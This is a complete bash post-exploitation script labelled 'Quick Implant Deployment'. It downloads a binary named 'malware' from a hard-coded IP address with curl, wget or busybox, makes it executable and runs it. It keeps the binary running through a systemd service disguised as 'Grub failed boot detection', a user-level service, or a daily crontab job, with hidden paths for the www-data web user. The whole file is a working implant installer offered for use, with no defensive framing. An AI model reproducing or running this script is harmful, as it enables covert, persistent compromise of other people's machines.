#!/bin/bash

# Colors
RESET="\033[0m"

BLACK="\033[30m"
RED="${RESET}\033[31m"
GREEN="${RESET}\033[32m"
YELLOW="${RESET}\033[33m"
BLUE="${RESET}\033[34m"
MAGENTA="\033[35m"
CYAN="${RESET}\033[36m"
WHITE="\033[37m"

BRIGHT_BLACK="\033[90m"
BRIGHT_RED="\033[91m"
BRIGHT_GREEN="\033[92m"
BRIGHT_YELLOW="\033[93m"
BRIGHT_BLUE="\033[94m"
BRIGHT_MAGENTA="\033[95m"
BRIGHT_CYAN="\033[96m"
BRIGHT_WHITE="\033[97m"

BOLD="\033[1m"
DIM="\033[2m"
ITALIC="\033[3m"
UNDERLINE="\033[4m"
BLINK="\033[5m"
REVERSE="\033[7m"
HIDDEN="\033[8m"

BG_BLACK="\033[40m"
BG_RED="${RESET}\033[41m${BRIGHT_RED}"
BG_GREEN="${RESET}\033[42m${BRIGHT_WHITE}"
BG_YELLOW="${RESET}\033[43m${BRIGHT_YELLOW}"
BG_BLUE="${RESET}\033[44m${BRIGHT_CYAN}"
BG_MAGENTA="\033[45m"
BG_CYAN="${RESET}\033[46m${BRIGHT_BLUE}"
BG_WHITE="\033[47m"

get_time() {
    date +"%H:%S"
}

success() {
    sleep 0.08
    local time
    time=$(get_time)
    printf "%b\n" "${BG_GREEN}[+]${RESET}${BRIGHT_GREEN}—${GREEN}[${GREEN}—${BRIGHT_GREEN}Success${GREEN}—]${BRIGHT_GREEN}—${GREEN}[${BG_GREEN}${time}${GREEN}]:${RESET} $1"
}

failed() {
    sleep 0.08
    local time
    time=$(get_time)
    printf "%b\n" "${BG_RED}[!]${RESET}${BRIGHT_RED}—${RED}[${RED}—${BRIGHT_RED}Failed${RED}——]${BRIGHT_RED}—${RED}[${BG_RED}${time}${RED}]:${RESET} $1"
}

info() {
    sleep 0.08
    local time
    time=$(get_time)
    printf "%b\n" "${BG_BLUE}[i]${RESET}${BRIGHT_BLUE}—${BLUE}[${BLUE}——${BRIGHT_BLUE}Info${BLUE}———]${BRIGHT_BLUE}—${BLUE}[${BG_BLUE}${time}${BLUE}]:${RESET} $1"
}

get_home() {
    local user="$1"
    [ -z "$user" ] && user="$USER"
    awk -F: -v u="$user" '$1 == u { print $6 }' /etc/passwd
}

info "Quick Implant Deployment"
info "Made by 0xSeve"

info "Setting proper variables.."
USER=$(id -un)
HOME=$(get_home "$USER")

info "Pulling implant.."
(command -v curl >/dev/null 2>&1 && curl -fsSL "http://45.39.190.188:8000/malware" -o /tmp/malware) || \
(command -v wget >/dev/null 2>&1 && wget -qO /tmp/malware "http://45.39.190.188:8000/malware") || \
(command -v busybox >/dev/null 2>&1 && busybox wget -qO /tmp/malware "http://45.39.190.188:8000/malware")

info "Changing implant permissions.."
chmod +x "/tmp/malware"

b=0
if [ "$(id -u)" -eq 0 ] && command -v systemctl >/dev/null 2>&1; then
    info "Setting systemd service for (root).."
    mv "/tmp/malware" /usr/bin/seed-initrd
    cat <<EOF > "/etc/systemd/system/seed-initrd.service"
[Unit]
Description=Grub failed boot detection
After=network.target

[Service]
Type=forking
TimeoutStartSec=0
ExecStart=/usr/bin/seed-initrd
User=root

[Install]
WantedBy=multi-user.target
EOF

    info "Initiating service.."
    systemctl daemon-reload 2>/dev/null
    systemctl enable "seed-initrd" 2>/dev/null
    systemctl start "seed-initrd" 2>/dev/null &

    info "Sleeping for 2sec.."
    sleep 2

    s=$(systemctl is-active "seed-initrd" 2>/dev/null)
    if [[ "$s" == "active" || "$s" == "activating" ]]; then
        b=1
        systemctl restart "seed-initrd" &
        success "Implant installed successfully!"
        success "Check the systemd service:"
        success "$ systemctl --no-pager status seed-initrd"
    else
        failed "Failed to install root systemd"
        failed "You can execute it manually here:"
        failed "$ nohup /usr/bin/seed-initrd &>/dev/null & disown"
    fi
fi


if [ "$b" -eq 0 ] && [ "$(id -un)" != "www-data" ]; then
    SERVICE_DIR="$HOME/.config/systemd/user"
    SERVICE_FILE="$SERVICE_DIR/seed-initrd.service"
    implant="$SERVICE_DIR/seed-initrd"

    info "Setting systemd service for ($USER).."
    mkdir -p "$SERVICE_DIR"
    mv "/tmp/malware" "$SERVICE_DIR/seed-initrd"
    cat > "$SERVICE_FILE" <<EOF
[Unit]
Description=Grub failed boot detection
After=network.target

[Service]
Type=simple
ExecStart=$SERVICE_DIR/seed-initrd
Restart=always

[Install]
WantedBy=default.target
EOF

    info "Initiating implant"

    systemctl --user daemon-reload 2>/dev/null
    systemctl --user enable "seed-initrd" 2>/dev/null
    systemctl --user start "seed-initrd" 2>/dev/null

    info "Sleeping for 2sec.."
    sleep 2

    s=$(systemctl --user is-active "seed-initrd" 2>/dev/null)
    if [[ "$s" == "active" || "$s" == "activating" ]]; then
        systemctl --user restart "seed-initrd" &
        success "Implant installed successfully!"
        success "Check the systemd service:"
        success "$ systemctl --no-pager --user status seed-initrd"
    else
        failed "Failed to install user systemd.. :<"
        failed "trying crontab for persistence.."

        info "Setting up implant for cronjob.."
        mkdir -p ~/.config/tasks
        mv $implant ~/.config/tasks/auto-update

        info "Setting up cronjob.."
        persist="@daily $HOME/.config/tasks/auto-update"

        info "Adding persistence mechanism (crontab).."

        if command -v crontab >/dev/null 2>&1; then
            (crontab -l 2>/dev/null; echo "$persist") | crontab -
            last_line=$(crontab -l 2>/dev/null | sed '/^\s*$/d' | tail -n 1)
            if [ "$last_line" = "$persist" ]; then
                success "Cronjob successfully created!"
                success "Persistence established.."
            fi
        else
            failed "Failed to add cronjob :<"
            failed "Implant is not persistent!"
            failed "You will lose the session/beacon (later).."
        fi

        info "You can execute it manually here:"
        info "$ nohup ~/.config/tasks/auto-update &>/dev/null & disown"
        nohup ~/.config/tasks/auto-update &>/dev/null & disown
    fi
fi


if [ "$(id -un)" = "www-data" ]; then
    info "Deploying implant for ($USER)"
    info "Setting up implant"
    mkdir -p /var/tmp/.webuser/tasks/
    mv /tmp/malware /var/tmp/.webuser/tasks/update

    info "Executing implant.."
    nohup /var/tmp/.webuser/tasks/update &>/dev/null & disown

    info "Setting up cronjob.."
    persist="@daily /var/tmp/.webuser/tasks/update"

    info "Adding persistence mechanism (crontab).."
    if command -v crontab >/dev/null 2>&1; then
        (crontab -l 2>/dev/null; echo "$persist") | crontab -
        last_line=$(crontab -l 2>/dev/null | sed '/^\s*$/d' | tail -n 1)
        if [ "$last_line" = "$persist" ]; then
            success "Cronjob successfully created!"
            success "Persistence established.."
        fi
    else
        failed "Failed to add cronjob :<"
        failed "Implant is not persistent!"
        failed "You will lose the session/beacon (later).."
    fi

    info "You can execute it manually here:"
    info "$ nohup /var/tmp/.webuser/tasks/update &>/dev/null & disown"
    nohup /var/tmp/.webuser/tasks/update &>/dev/null & disown
fi
